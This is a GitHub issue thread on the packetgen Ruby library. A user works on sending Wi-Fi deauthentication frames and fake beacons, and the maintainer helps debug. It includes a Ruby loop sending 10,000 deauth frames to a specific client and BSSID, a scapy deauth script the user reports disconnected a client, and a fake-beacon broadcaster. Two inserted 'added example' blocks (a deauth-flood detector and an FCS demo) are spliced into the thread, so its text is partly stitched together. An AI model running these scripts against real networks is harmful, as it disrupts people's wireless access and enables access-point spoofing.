Sending Deauth packet #55

Closed
KINGSABRI opened this issue Oct 23, 2017 · 18 comments

@KINGSABRI

Hello guys,
I see you have done tremendous work on packetgen; however, I believe more examples are needed for each header.

I was looking to send a Dot11 DeAuth packet and I couldn't do it using the available docs.

My suggestion is to make one or more practical examples for each header, as you've done with the manipulate packets part.

Thanks again for the great effort.

@sdaubert (Owner)

There are more examples in the API documentation. See http://www.rubydoc.info/gems/packetgen/PacketGen/Header/. But, unfortunately, there is no example for Dot11::DeAuth.

I'm currently working on better documentation (see wiki). Dot11 classes will be done with high priority.

@sdaubert sdaubert added the doc label Oct 23, 2017
@sdaubert sdaubert self-assigned this Oct 23, 2017
@picatz (Contributor) commented Oct 23, 2017

Not off topic: @sdaubert Is probably one of my favorite developers ever. ❤️

@sdaubert (Owner)

@KINGSABRI Dot11 is quite special in PacketGen. You have to instantiate a subclass (here a Dot11::Management) to use it. And Management frames may contain multiple sub-headers. So, to generate a simple DeAuth packet:

```ruby
pkt = PacketGen.gen('Dot11::Management', mac1: dstaddr, mac2: srcaddr, mac3: bssid).add('Dot11::DeAuth', reason: reason_code)
```

You may also want to add a RadioTap header:

```ruby
pkt = PacketGen.gen('RadioTap').add('Dot11::Management', mac1: dstaddr, mac2: srcaddr, mac3: bssid).add('Dot11::DeAuth', reason: reason_code)
```

Before sending such a packet on the wire, don't forget to compute the checksum:

```ruby
pkt.calc_checksum
```

@KINGSABRI (Author) commented Oct 25, 2017

Hello @sdaubert
I've tried both and they didn't work:

```ruby
require 'packetgen'
iface, bssid, client, count = [ 'mon0', '2C:AB:00:A9:6C:64',  '98:F1:70:95:D1:63', 10000 ]
pkt = PacketGen.gen('RadioTap').add('Dot11::Management', mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7)
#pkt = PacketGen.gen('RadioTap').add('Dot11::Management', type: 0, subtype: 12, mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7).to_w(iface)
pkt.calc_checksum

count.times do
  pkt.to_w(iface)
  puts 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + ' for Client: ' + client
  sleep 0.1
end
```

I've tested the same scenario with scapy and it works: the client was disconnected.

```python
from scapy.all import *
pkt = RadioTap()/Dot11(addr1 = client, addr2 = bssid, addr3 = bssid)/Dot11Deauth()
sendp(pkt, iface = iface, count = count, inter = 0.2)
```

@KINGSABRI (Author) commented Oct 25, 2017

Another case I'm working on is creating a fake beacon, as in scapy:

```python
import sys
from scapy.all import *

broadcast = "ff:ff:ff:ff:ff:ff"
bssid     = "aa:aa:aa:aa:aa:aa"
iface     = "mon0"
pkt = RadioTap() / Dot11(addr1 = broadcast, addr2 = bssid, addr3 = bssid) / Dot11Beacon(cap = 0x1104) / Dot11Elt(ID=0, info = sys.argv[1]) / Dot11Elt(ID=1, info= "\x82\x84\x96\x24\x30\x48\x6c") / Dot11Elt(ID=3, info = "\x0b") / Dot11Elt(ID=5, info="\x00\x01\x00\x00")
sendp(pkt, iface=iface, count=int(sys.argv[2]), inter = 0.2)
```

but in PacketGen

```ruby
pkt = PacketGen.gen('RadioTap')
               .add('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid)
               .add('Dot11::Beacon', cap: 0x0431)
               .add('Dot11::Element', type: 0, value: ssid)
               .add('Dot11::Element', type: 1, value: "\x82\x84\x8b\x96\x12\x24\x48\x6c")
               .add('Dot11::Element', type: 3, value: "\x06")
               .add('Dot11::Element', type: 5, value: "\x00\x01\x00\x00")
```

I'm getting:

```text
/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:350:in `add_header': undefined method `protocol_name' for #<PacketGen::Header::Dot11::Element:0x000056332f6116e8> (NoMethodError)
        from /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:147:in `add'
```

I'm trying to add more Elements to the Beacon.

@KINGSABRI (Author) commented Oct 25, 2017

Well, after more and more troubleshooting of the Deauth case, I found that nothing has been sent to the wire!
I ran Wireshark with the filter ((wlan.fc.type == 0)&&(wlan.fc.type_subtype == 0x0c)) and got nothing captured.
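The Wireshark filter above selects management frames (type 0) whose subtype is 12 (deauthentication), and the mac1/mac2/mac3 parameters from sdaubert's explanation map onto addr1/addr2/addr3 of the 802.11 MAC header. The following is an added example, not code from packetgen or from this issue: a plain-Ruby decoder for that frame layout (no PacketGen dependency) plus a simple rate-based check that flags a transmitter address sending a burst of deauthentication frames, which is the kind of logic a monitoring script reading from a capture interface would run. The frame bytes, MAC addresses and timestamps are constructed sample data.

```ruby
# Added example (not part of packetgen or this issue): decoder for IEEE 802.11
# deauthentication frames plus a rate-based flood check.
# All frames, addresses and timestamps below are constructed sample data.
MGMT_TYPE      = 0
DEAUTH_SUBTYPE = 12   # Wireshark: wlan.fc.type == 0 && wlan.fc.type_subtype == 0x0c

def mac_str(six_bytes)
  six_bytes.unpack('C6').map { |b| format('%02x', b) }.join(':')
end

# Decode the 24-byte MAC header and the 2-byte reason code of a deauth frame
# (input has no RadioTap header and no FCS). Returns nil for any other frame,
# which is the same selection the Wireshark filter in the thread makes.
def parse_deauth(frame)
  return nil if frame.bytesize < 26
  fc0     = frame.getbyte(0)
  version = fc0 & 0x03
  type    = (fc0 >> 2) & 0x03
  subtype = (fc0 >> 4) & 0x0f
  return nil unless version == 0 && type == MGMT_TYPE && subtype == DEAUTH_SUBTYPE
  {
    flags:    frame.getbyte(1),
    duration: frame.byteslice(2, 2).unpack('v')[0],
    addr1:    mac_str(frame.byteslice(4, 6)),   # receiver    (mac1 in PacketGen)
    addr2:    mac_str(frame.byteslice(10, 6)),  # transmitter (mac2)
    addr3:    mac_str(frame.byteslice(16, 6)),  # BSSID       (mac3)
    seq:      frame.byteslice(22, 2).unpack('v')[0] >> 4,
    reason:   frame.byteslice(24, 2).unpack('v')[0]
  }
end

# True if at least `threshold` timestamps fall inside some `window`-second span.
def burst?(times, window, threshold)
  sorted = times.sort
  lo = 0
  sorted.each_with_index do |t, hi|
    lo += 1 while t - sorted[lo] > window
    return true if hi - lo + 1 >= threshold
  end
  false
end

# events: array of [timestamp_seconds, raw_frame]. Returns the transmitter
# addresses (addr2) that sent a burst of deauthentication frames.
def deauth_flood_sources(events, window: 1.0, threshold: 5)
  per_src = Hash.new { |h, k| h[k] = [] }
  events.each do |ts, frame|
    d = parse_deauth(frame)
    per_src[d[:addr2]] << ts if d
  end
  per_src.select { |_src, times| burst?(times, window, threshold) }.keys
end

# --- constructed sample data (hypothetical, locally administered addresses) ---
def build_sample_deauth(addr1, addr2, addr3, reason, seq: 0)
  fc    = [(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0x00].pack('C2')
  addrs = [addr1, addr2, addr3].map { |m| [m.delete(':')].pack('H*') }.join
  fc + [0].pack('v') + addrs + [seq << 4].pack('v') + [reason].pack('v')
end

AP     = '02:00:00:00:00:01'
CLIENT = '02:00:00:00:00:02'
ROGUE  = '02:00:00:00:00:ff'

SAMPLE_EVENTS =
  [[0.0, build_sample_deauth(CLIENT, AP, AP, 3)]] +                  # one legitimate deauth (reason 3)
  (0...20).map { |i| [10.0 + i * 0.1, build_sample_deauth(CLIENT, ROGUE, ROGUE, 7, seq: i)] } +
  [[11.0, "\x80\x00".b + "\x00".b * 30]]                               # beacon-like frame, must be ignored

if __FILE__ == $PROGRAM_NAME
  puts "deauth flood sources: #{deauth_flood_sources(SAMPLE_EVENTS).inspect}"
end
```

On a real capture the events array would be filled from a pcap with the RadioTap header and trailing FCS stripped first; parse_deauth deliberately handles only the bare MAC frame so the field offsets stay readable.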

@sdaubert (Owner)

@KINGSABRI I think nothing has been sent on the wire because the RadioTap header is not set. But it seems to me you don't need to add a RadioTap header: the driver should do it for you.

Unfortunately, I can't verify that: my laptop is broken and I have no wifi on my PC.

@sdaubert (Owner) commented Oct 25, 2017

@KINGSABRI about Elements.

Well, Elements are not headers. And I do nothing to help with using them. You have to instantiate and add them by hand:

```ruby
pkt = PacketGen.gen('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid).
                add('Dot11::Beacon', cap: 0x0431)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 0, value: ssid)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 1, value: "\x82\x84\x8b\x96\x12\x24\x48\x6c")
```

Thanks to you, I see that I have still some work 😃

@KINGSABRI (Author) commented Oct 26, 2017

> I think nothing has been sent on the wire because the RadioTap header is not set. But it seems to me you don't need to add a RadioTap header: the driver should do it for you.

```ruby
pkt = PacketGen.gen('Dot11::Management', mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7)
pkt.calc_checksum
pkt.to_w(iface)
```

error:

```text
/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/header/dot11.rb:305:in `to_w': undefined local variable or method `crc32' for #<PacketGen::Header::Dot11::Management:0x0000557deab57468> (NameError)
        from /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:216:in `to_w'
        from ./deauth.rb:30:in `<main>'
```

> Well, Elements are not headers. And I do nothing to help with using them. You have to instantiate and add them by hand:

I followed your code but I'm getting an error:

```text
/var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/header/dot11.rb:305:in `to_w': undefined local variable or method `crc32' for #<PacketGen::Header::Dot11::Management:0x00005648705bebe0> (NameError)
        from /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/packet.rb:216:in `to_w'
        from ./facke-beacon.rb:38:in `<main>'
```

my code:

```ruby
pkt = PacketGen.gen('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid).add('Dot11::Beacon', cap: 0x0431)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 0, value: ssid)
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 1, value: "\x82\x84\x8b\x96\x12\x24\x48\x6c")
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 3, value: "\x06")
pkt.dot11_beacon.elements << PacketGen::Header::Dot11::Element.new(type: 5, value: "\x00\x01\x00\x00")

pkt.calc_checksum
pkt.to_w
```

@KINGSABRI (Author) commented Oct 26, 2017

> Thanks to you, I see that I have still some work

You've done a great job already, man.
You just need people to test and report more issues and write more protocols.

I believe you need:

  • better documentation (actually, practical / example documentation)
  • more protocols
  • a focus on keeping things simple to use. Things like elements could be easier, like

```ruby
pkt.dot11_beacon.add_element(type: 0, value: ssid)
```

Or

```ruby
pkt = PacketGen.gen('Dot11::Management', mac1: broadcast, mac2: bssid, mac3: bssid).add('Dot11::Beacon', cap: 0x0431).add_element('Dot11::Element', type: 0, value: ssid)
```

@sdaubert (Owner)

> pkt.dot11_beacon.add_element(type: 0, value: ssid)

Yes, I planned something like that yesterday.

@sdaubert (Owner)

> /var/lib/gems/2.4.0/gems/packetgen-2.1.2/lib/packetgen/header/dot11.rb:305:in `to_w': undefined local variable or method `crc32'

As I have no means to test, could you please test, on the erroneous line:

```ruby
pcap.inject str
```

instead of

```ruby
pcap.inject str << [crc32].pack('V')
```

The FCS is already computed by #calc_checksum, so this code is useless.
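To make the FCS discussion concrete, here is an added example in plain Ruby (not packetgen code and not from this issue) that computes the 802.11 frame check sequence the way the quoted line does, as a CRC-32 (Ruby's zlib uses the same polynomial) appended little-endian, and verifies a frame the way a receiver would. It assumes, as the comment above says, that the serialized frame already ends with its FCS, and uses a constructed 26-byte deauthentication frame as input. It also shows what a doubled CRC does: the frame still verifies, but its body is four bytes longer than a deauthentication body should be, which is the kind of trailing data a dissector reports as unexpected.

```ruby
require 'zlib'

# Added example (not packetgen code): 802.11 FCS = CRC-32 over MAC header + body,
# appended little-endian, exactly what [crc32].pack('V') produces.

# Constructed 26-byte deauthentication frame without FCS: frame control 0xc0 0x00,
# duration 0, addr1/addr2/addr3 (hypothetical locally administered addresses),
# sequence control 0, reason code 7.
SAMPLE_FRAME = [%w[
  c000 0000
  020000000002 020000000001 020000000001
  0000 0700
].join].pack('H*')

MAC_HEADER_LEN = 24   # fixed management-frame header before the body

def fcs(bytes)
  [Zlib.crc32(bytes)].pack('V')
end

def append_fcs(bytes)
  bytes + fcs(bytes)
end

# A receiver recomputes the CRC over everything before the last four bytes.
def fcs_valid?(frame)
  return false if frame.bytesize <= 4
  body = frame.byteslice(0, frame.bytesize - 4)
  frame.byteslice(-4, 4) == fcs(body)
end

# Strip a verified FCS; raise on a frame a receiver would silently drop.
def strip_fcs(frame)
  raise ArgumentError, 'bad FCS' unless fcs_valid?(frame)
  frame.byteslice(0, frame.bytesize - 4)
end

# Length of the frame body once the FCS is removed. A deauthentication body is
# exactly 2 bytes (the reason code); anything longer is unexpected trailing data.
def body_length(frame_with_fcs)
  strip_fcs(frame_with_fcs).bytesize - MAC_HEADER_LEN
end

# Flip one bit in a copy so the CRC no longer matches.
def corrupt(frame)
  bad = frame.b
  bad.setbyte(0, bad.getbyte(0) ^ 0x01)
  bad
end

if __FILE__ == $PROGRAM_NAME
  once  = append_fcs(SAMPLE_FRAME)
  twice = append_fcs(once)   # what appending the CRC a second time yields
  puts "single FCS valid: #{fcs_valid?(once)}, body #{body_length(once)} bytes"
  puts "double FCS valid: #{fcs_valid?(twice)}, body #{body_length(twice)} bytes"
  puts "corrupted valid:  #{fcs_valid?(corrupt(once))}"
end
```

The doubled case is the instructive one: because the second CRC is computed over the first, the frame passes the integrity check and is delivered, so the problem only shows up as a body that is 6 bytes instead of 2 when the frame is dissected.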

@KINGSABRI (Author) commented Oct 26, 2017

@sdaubert Good news and bad news.
The good news is, after I changed what you advised, it started sending packets.
The bad news is it's a malformed packet, something like an invalid packet.
Note: I used

```ruby
pkt = PacketGen.gen('Dot11::Management', mac1: client, mac2: bssid, mac3: bssid).add('Dot11::DeAuth', reason: 7)
```

No RadioTap header; if I add the RadioTap header, nothing gets sent.
All Deauth attacks I've seen use a RadioTap header.

@KINGSABRI (Author)

Regarding creating the fake beacon, nothing changed: no packets sent.

@sdaubert (Owner)

@KINGSABRI Do you have an ethernet interface?

Packet#to_w sends on the first network interface, which is usually an ethernet one. To send your Dot11 packet on your wifi card, you have to specify your network interface, for example:

```ruby
pkt.to_w('wlan0')
```

@KINGSABRI (Author)

> Packet#to_w sends on the first network interface, which is usually an ethernet one. To send your Dot11 packet on your wifi card, you have to specify your network interface, for example:

I've done that; my wireless interface is mon0 and I've added pkt.to_w(mon0).

I tried it in both scenarios.

@sdaubert (Owner)

@KINGSABRI I have opened a new issue for this problem: #56

@sdaubert (Owner)

Doc has been updated.

See https://github.com/sdaubert/packetgen/wiki/wifi. API documentation has also been updated (not yet available on http://www.rubydoc.info/gems/packetgen/PacketGen/Header/Dot11.html, will be on next release)
